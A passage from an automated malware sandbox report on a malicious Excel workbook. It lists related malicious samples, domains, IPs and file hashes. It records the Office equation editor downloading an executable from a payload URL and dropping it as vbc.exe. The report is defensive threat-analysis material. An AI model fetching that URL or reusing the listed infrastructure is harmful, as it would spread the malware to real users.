                                                                                                                                                                      foHzqhWjvn.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.ruhexuangou.com/p2io/?wR=MHQD&4h0=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1trRh/TEm4y3
                                                                                                                                                                      27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                                                                                                      • www.ruhexuangou.com/p2io/?RR=YrKhZvg&rp=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLrxuz88fTw

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      www.ruhexuangou.com36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      foHzqhWjvn.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.comg2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 34.215.222.250
                                                                                                                                                                      36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 54.69.66.227
                                                                                                                                                                      50729032021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 34.215.222.250
                                                                                                                                                                      loMStbzHSP.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 54.69.66.227
                                                                                                                                                                      www.aideliveryrobot.com50729032021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.128.23.153
                                                                                                                                                                      mar2403.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.58.78.16

                                                                                                                                                                      ASN

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                      AMAZON-02USV3kT2daGkz.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.217.45.230
                                                                                                                                                                      Bank Details.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      PR0078966.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 13.235.115.155
                                                                                                                                                                      presupuesto.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      NdBLyH2h5d.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.15.160.167
                                                                                                                                                                      s6G3ZtvHZg.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 3.13.255.157
                                                                                                                                                                      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                      PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.79.124.173
                                                                                                                                                                      g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 44.227.76.166
                                                                                                                                                                      sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.58.78.16
                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                      SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 13.235.115.155
                                                                                                                                                                      remittance info.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      Required Order Quantity.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 108.128.238.226
                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                      Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 3.14.206.30
                                                                                                                                                                      LEASEWEB-USA-SFO-12US36ne6xnkop.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 147.255.162.204
                                                                                                                                                                      rErRI1Ktbf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.108.117.12
                                                                                                                                                                      Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      fDFkIEBfpm.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 147.255.112.41
                                                                                                                                                                      foHzqhWjvn.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 147.255.162.204
                                                                                                                                                                      4TYyYEdhtj.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 147.255.112.41
                                                                                                                                                                      27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.82.57.32
                                                                                                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 142.91.138.224
                                                                                                                                                                      Swift File_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 142.91.138.224
                                                                                                                                                                      FB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 142.234.150.52
                                                                                                                                                                      YwngUG2lY5Get hashmaliciousBrowse
                                                                                                                                                                      • 23.82.19.250
                                                                                                                                                                      shed.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.81.33.40
                                                                                                                                                                      1S0a576pAR.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.106.160.164
                                                                                                                                                                      NJx63jHebE.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.106.160.164
                                                                                                                                                                      j64eIR1IEK.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.105.124.225
                                                                                                                                                                      Doc_37584567499454.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 23.105.124.225
                                                                                                                                                                      J0OmHIagw8.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.105.124.225
                                                                                                                                                                      JAAkR51fQY.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 23.105.124.225
                                                                                                                                                                      AMAZON-02USV3kT2daGkz.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.217.45.230
                                                                                                                                                                      Bank Details.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      PR0078966.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 13.235.115.155
                                                                                                                                                                      presupuesto.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      NdBLyH2h5d.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.15.160.167
                                                                                                                                                                      s6G3ZtvHZg.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 3.13.255.157
                                                                                                                                                                      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                      PAYMENT COPY.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.79.124.173
                                                                                                                                                                      g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 44.227.76.166
                                                                                                                                                                      sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 52.58.78.16
                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                      SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 13.235.115.155
                                                                                                                                                                      remittance info.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      Required Order Quantity.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 108.128.238.226
                                                                                                                                                                      Proforma Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 18.184.197.212
                                                                                                                                                                      Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                      winlog.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 3.14.206.30

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      No context

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      No context

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe
                                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):838656
                                                                                                                                                                      Entropy (8bit):7.463586149126734
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:57n6WrZCWUV4Q3tJJ7eUMHaEKWAJuuXnvYH427ED7GcaSlUwSALuitlCFcozLgHj:576Wrox4QdbeUM8Wn+cEXHg
                                                                                                                                                                      MD5:396071CF13F858E6677A6655A2D173BB
                                                                                                                                                                      SHA1:5DBAD9D82FCF0D3BB83479AFEC8EA61441443263
                                                                                                                                                                      SHA-256:DD987F07D4E8F3D29758757AEA5FF5FEE6FCA9927D79E18F429B513E42491A09
                                                                                                                                                                      SHA-512:604EF9B2EDE3A60E48A760B77E41F561DF6BB8EC00E93E37EB475FB30BEB16C631D2ADAFF299C7110B7341F675D235462D68E91DD2D8BF595B3AE8CCEA04D74E
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 16%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      IE Cache URL:http://3.125.17.227/winme/xles.exe
                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`3s`..............P.................. ........@.. ....................... ............@.................................4...W.......P............................................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......0...........9...................................................q.A.1.oe<.F.A.I....r..7Q...j.J.B_}.!...'!.P..[8. ...S.].......Z}Q..6..o.J.....>#....7..5M".W.......9^bC....."..c..@l@=..5W,..G..f..gm..LZ.x.r.../=..Q......Y$-...e_.va.7`.x...D.......F0.....*J.^...%.+R...I..i..o.i.j..:^...7.T#......Z..I./.;.<....5.g..\b.)Z.Bw...j.\*..8{p.[(./.......7..$.q..g..3|..n.T..(..j^.!...n..../.E..........+...(.5m.....v..x...ar...7..R.v>..a.B.E./s....4.jHl.....
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F0E3D0.png
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):79394
                                                                                                                                                                      Entropy (8bit):7.864111100215953
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                      MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                      SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                      SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                      SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6979E67D.emf
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2524
                                                                                                                                                                      Entropy (8bit):2.5264785429958594
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YAbuAK0/qejmz8mSXZQsYzxLQTlJtS0WvusBV5f5n:Vgz8vXZQsYzuTlPWv1HR
                                                                                                                                                                      MD5:BDD597F29DB4535040C6A668EEA6AC72
                                                                                                                                                                      SHA1:3272BCE0EDB0F476371B0A6FEF16B1F5DB169D51
                                                                                                                                                                      SHA-256:AA7439DACC052B05B5CBC4B5DA0F0F2077797DE8D92DB763416A469C8E3DA2E5
                                                                                                                                                                      SHA-512:0CF29A4A033D2F5354573E99FE74AA9BA01D10C8CECC54DBD6A46208BAB01D3FB8DF387BFCA25AF8DA6E0E9E365927EA0C8C57DAD54F6B913B0395C80E018108
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: ....l.................................. EMF........1...................V...........................fZ..U"..F...........GDIC........18......................................................................iii.......-.........!.................!.............................-.........!.................!.............................-.........!.................!.............................-.........!.................!.............................-.........!...............-.........!..................................................................................@..Calibri..2...4.......Iww@.zw.2f.....-.................'.....................................................................................!.......'...............iii.....%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........L...d.......
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AEACB78.png
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):51166
                                                                                                                                                                      Entropy (8bit):7.767050944061069
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                      MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                      SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                      SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                      SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8DCE764B.png
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):51166
                                                                                                                                                                      Entropy (8bit):7.767050944061069
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                      MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                      SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                      SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                      SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C627CB57.emf
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):653280
                                                                                                                                                                      Entropy (8bit):2.8986571644672834
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:834UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:O4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                      MD5:63E520516CA2B8379337861355EBB469
                                                                                                                                                                      SHA1:66173F86A7F0993EF909380273E4765E2555DEB4
                                                                                                                                                                      SHA-256:0C0AB37927121C7377EEF5404129F13FAD548AD4C9C130A51864D2CA23941DC5
                                                                                                                                                                      SHA-512:5C1F52F2F910F833CE9628CF07FAB6F45AD752C636F7A0E1BB9A449A867E72EDB06F92C34F5C9853F31D5C47D2EDD548B9A17351FA72AF08F629CE1125085B44
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................P........N0`P...H...........4....N0`P...H... ....y\VH...P... ............z\V............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...H...|....2UV.................{SV............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... .e.6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C688FD6C.emf
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3956
                                                                                                                                                                      Entropy (8bit):2.8149329918168324
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:s4lro06HwsK+1s7RPFk5WAevMZdJx1FuvFI0pzwrlKR:Nlo0AKOs7RPK5WAevmd/uWTKR
                                                                                                                                                                      MD5:60520E9C55A0AAB5CE254E12D63DB1C8
                                                                                                                                                                      SHA1:6C44AE09FECFFA75C9201ED089BBDF09E094EE76
                                                                                                                                                                      SHA-256:3F479C26CA2C48C14159D6D61E0E9C0CB5F45AABB55C0321143FD75369C2C6D6
                                                                                                                                                                      SHA-512:9A8A7A86E761C89A80422DAA69B9976A5E704A3114E9D0E9FAE87649A6B994E1FEFA41D407F14DC5175AF24AEC09DA561031A84F1D1E7CCDAB273634B1442525
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ....l...............f...............|1.. EMF....t...>...................V...........................fZ..U"..F...`...R...GDIC...........H....:.............................................g.................iii.......-.........!...g.............!.......f.....................-.........!...f.............!.............................-.........!...e.............!.......e.....................-.........!...d.............!.............................-.........!...c...........-.........!...a.......................g......................................................@..Calibri..2..P4.......Iww@.zw.-f.....-.................2.>.........>...P.T.......2.P.........P...b.o.......2.b.........b...t.g.......2.t.........t.....g.......2.................l.......2.................e.......2.................B.......2.................u.......2.................t.......2.................t.......2.................o.......2.................n.......2...............(.1.......'...................................g...
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9B62519.png
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):79394
                                                                                                                                                                      Entropy (8bit):7.864111100215953
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                      MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                      SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                      SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                      SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):241332
                                                                                                                                                                      Entropy (8bit):4.2067576375268345
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:cGNLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:ckNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                                                                      MD5:742EA69FE63E914272204C32151C71DC
                                                                                                                                                                      SHA1:70BBB031AFC67F61452470222AC68DE4A0CF517A
                                                                                                                                                                      SHA-256:6ABCDDA7C299ABE123EAF67FAC08674A81E7095A76047AC0B4D0EF9C1FAA5920
                                                                                                                                                                      SHA-512:1ABF80645F2020A38196FD9E9B3EF7699187E9C26EDD8EA34CAE787098A9DB5EB81A382B27D3B2AC4F9DA3045D88E4B58B07B58048353877BB6B8100E58A8BDB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                                                                                      C:\Users\user\Desktop\~$Processed APR12.xlsx
                                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):838656
                                                                                                                                                                      Entropy (8bit):7.463586149126734
                                                                                                                                                                      Encrypted:false
